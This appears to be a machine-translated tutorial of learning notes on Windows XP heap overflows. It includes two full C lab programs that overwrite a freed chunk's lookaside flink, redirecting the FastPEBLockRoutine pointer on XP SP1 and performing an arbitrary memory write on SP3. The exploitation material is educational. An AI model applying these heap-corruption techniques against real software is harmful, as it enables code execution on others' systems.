Heap Overflow learning notes

0x00 Overview

This article starts from the program instance and shows the heap overflow + code execution under XP SP1, heap overflow under XP SP3 + arbitrary memory write, mainly for {I have mastered the buffer overflow principle, beginners who want to learn more about the heap overflow principle}, {Security fans who want to find a heap overflow example to run it again}, and {examples of heap overflow books that cannot run through code the searcher who reads the book}

Reference from: http://net-ninja.net/article/2011/Sep/03/heap-overflows-for-humans-102/

After many changes to the code, I finally ran through and tried to use it easily.

Based on the reader's perspective of the code, I have explained the ideas.

Note is for reference only for beginners. It is not a serious discussion of heap overflow details. If you have any mistakes, please correct them.

 

0x01 test code Environment

Virtual Machine: VirtualBox Operating System: Windows XP sp1 Compiler: VC ++ 6.0 debugging tool: xueollyice

Among them, Windows XP can only be sp1, because the article will be more complicated to bypass its overflow protection mechanism after sp2.

If you want to find any memory write instance under xp sp3, jump to 0x09.

0x02 test code steps

Install Windows XP sp1 note, there are a lot of sp2 on the Internet do not know what purpose is written as sp1, below is the real sp1 http://pan.baidu.com/share/link? Required id = 371613660 & uk = 1865555701 & fid = 2361791550

Download VC ++ 6.0 Green Edition http://pan.baidu.com/s/1kTLqYnd unzip and run sin. bat

Download Code engineering http://pan.baidu.com/s/1kT5HRNp

Or copy the code in the text to create a new project.

 

/*        Overwriting a chunk on the lookaside example*/#include <stdio.h>#include <windows.h>void print(){    printf("\nHello\n");}int main(int argc,char *argv[]){        char *a,*b,*c;        long *hHeap;        char buf[10];        printf("----------------------------\n");        printf("Overwrite a chunk on the lookaside\n");        printf("Heap demonstration\n");        printf("----------------------------\n");        // create the heap        hHeap = HeapCreate(0x00040000,0,0);        printf("\n(+) Creating a heap at: 0x00%xh\n",hHeap);        printf("(+) Allocating chunk A\n");        // allocate the first chunk of size N (<0x3F8 bytes)        a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Allocating chunk B\n");        // allocate the second chunk of size N (<0x3F8 bytes)        b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Chunk A=0x00%x\n(+) Chunk B=0x00%x\n",a,b);        printf("(+) Freeing chunk B to the lookaside\n");        // Freeing of chunk B: the chunk gets referenced to the lookaside list        HeapFree(hHeap,0,b);        // set software bp        //__asm__("int $0x3");        printf("(+) Now overflow chunk A:\n");        // The overflow occurs in chunk A: we can manipulate chunk B's Flink        // PEB lock routine for testing purposes        // 16 bytes for size, 8 bytes for header and 4 bytes for the flink        strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB\x20\xf0\xfd\x7f");        // strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBBDDDD");        //gets(a);        // set software bp        //__asm__("int $0x3");        printf("(+) Allocating chunk B\n");        // A chunk of block size N is allocated (C). Our fake pointer is returned        // from the lookaside list.        b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Allocating chunk C\n");        // set software bp        //    __asm__("int $0x3");        // A second chunk of size N is allocated: our fake pointer is returned        c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Chunk A=0x00%x\n(+)Chunk B=0x00%x\n(+) Chunk C=0x00%x\n",a,b,c);        // A copy operation from a controlled input to this buffer occurs: these        // bytes are written to our chosen location        // insert shellcode here        printf("%x",print);        memcpy(c,"\x00\x10\x40\x00",4);        // set software bp        //_asm int 0x3;        exit(0); }

 

Compile and run the program. If you are lucky, you can run the program directly:

Displayed as: 401005 (0x00401005), and then modify the code:

memcpy(c,"\x00\x10\x40\x00",4);

Change

memcpy(c,"\x05\x10\x40\x00",4);

Re-compile and run the program. After successful compilation, see:

Then you can start the text.

0x03 overflow location

Previously, we allocated a heap 0x10 (16 bytes ).

a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);

Therefore

strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB\x20\xf0\xfd\x7f");

Overflow occurred.

0x04 What happened before overflow

HeapFree(hHeap,0,b);

 

Remove B free, and then B will be placed in the lookaside list for backup.

0x05 what is covered after Overflow

Overwrite the freelist chunk structure of B.

(AAAABBBB overwrites Headers, and \ x20 \ xf0 \ xfd \ x7f overwrites flink)

0x06 what happened after Overflow

printf("(+) Allocating chunk B\n");// A chunk of block size N is allocated (C). Our fake pointer is returned// from the lookaside list. b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10); printf("(+) Allocating chunk C\n");// set software bp//    __asm__("int $0x3");// A second chunk of size N is allocated: our fake pointer is returnedc = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);printf("(+) Chunk A=0x00%x\n(+)Chunk B=0x00%x\n(+) Chunk C=0x00%x\n",a,b,c);

 

First, B is retrieved from lookaside (flink has been overwritten), and then c is allocated, So c is allocated to flink of B, which is our false pointer, then the memory can be written as needed (the content written into c is written into false pointers)

0x07 where the false Pointer Points

0x7FFDF000 points to FastPEBLockRoutine () Address pointer (XP SP1). We overwrite this address so that once an exception is triggered, the address will be called.

Then we write the print function address, so we will execute the print function (display the address of the print function printed on Hello and Hello)

0x08 why XP SP1 is required to run the above Code

Because the address of FastPEBLockRoutine () in SP1 is fixed, and Versions later than SP2 will be random

0x09 I just want to run the code under XP SP3. I don't want to download SP1

Use the following code, but you cannot call FastPEBLockRoutine () at will.

 

/*        Overwriting a chunk on the lookaside example*/#include <stdio.h>#include <windows.h>int main(int argc,char *argv[]){        char str[]="\nHello123456789213456789\n";        char *a,*b,*c;        long *hHeap;        char buf[10];        printf("----------------------------\n");        printf("Overwrite a chunk on the lookaside\n");        printf("Heap demonstration\n");        printf("----------------------------\n");        // create the heap        hHeap = HeapCreate(0x00040000,0,0);        printf("\n(+) Creating a heap at: 0x00%xh\n",hHeap);        printf("(+) Allocating chunk A\n");        // allocate the first chunk of size N (<0x3F8 bytes)        a = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Allocating chunk B\n");        // allocate the second chunk of size N (<0x3F8 bytes)        b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Chunk A=0x00%x\n(+) Chunk B=0x00%x\n",a,b);        printf("(+) Freeing chunk B to the lookaside\n");        // Freeing of chunk B: the chunk gets referenced to the lookaside list        HeapFree(hHeap,0,b);        // set software bp        //__asm__("int $0x3");        printf("(+) Now overflow chunk A:\n");        // The overflow occurs in chunk A: we can manipulate chunk B's Flink        // PEB lock routine for testing purposes        // 16 bytes for size, 8 bytes for header and 4 bytes for the flink        printf("%x\n",str);        printf(str);        memcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB\x64\xff\x12\x00",28);        // strcpy(a,"XXXXXXXXXXXXXXXXAAAABBBBDDDD");0x71ac4050        //gets(a);        // set software bp        //__asm__("int $0x3");        printf("(+) Allocating chunk B\n");        // A chunk of block size N is allocated (C). Our fake pointer is returned        // from the lookaside list.        b = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Allocating chunk C\n");        // set software bp        //    __asm__("int $0x3");        // A second chunk of size N is allocated: our fake pointer is returned        c = HeapAlloc(hHeap,HEAP_ZERO_MEMORY,0x10);        printf("(+) Chunk A=0x00%x\n(+)Chunk B=0x00%x\n(+) Chunk C=0x00%x\n",a,b,c);        // A copy operation from a controlled input to this buffer occurs: these        // bytes are written to our chosen location        // insert shellcode here        strcpy(c,"AAAAAAAAAAAA\n");        printf(str);        // set software bp        //_asm int 0x3;        exit(0); }

 

You may be able to run it once, but it is generally the same as below

Old Rules: change the code by yourself (12ff64 in the figure) 0x0012ff64

 

memcpy(a,"XXXXXXXXXXXXXXXXAAAABBBB\x64\xff\x12\x00",28);

 

Note that \ x00 exists, so I switched to memcpy, as shown in figure

Then, this code shows the arbitrary memory writing (without the use of call anycode), but writes any content to str, that is, free (B ), overwrite the flink of B with the str address, retrieve B, allocate c and c to the str address, write AAAAAAA to c, and then write it into str.

0x0A conclusion

Personal point of view: although the readers here still seem to understand the principle and process of heap overflow, at least they have a basic concept, it has laid the foundation of interest for in-depth research on its mechanism in the future, and for {Just Curious fans}, it is enough to be involved.

It is recommended that interested friends to look at the original heap-overflows-for-humans-102, there are a lot of basic concepts to explain, this note is only a learning record, not serious translation of the original.

0x0B reference

Http://net-ninja.net/article/2011/Sep/03/heap-overflows-for-humans-102/

Note: the code in this article is modified based on this article, which is greatly changed.

C and C ++ Security Code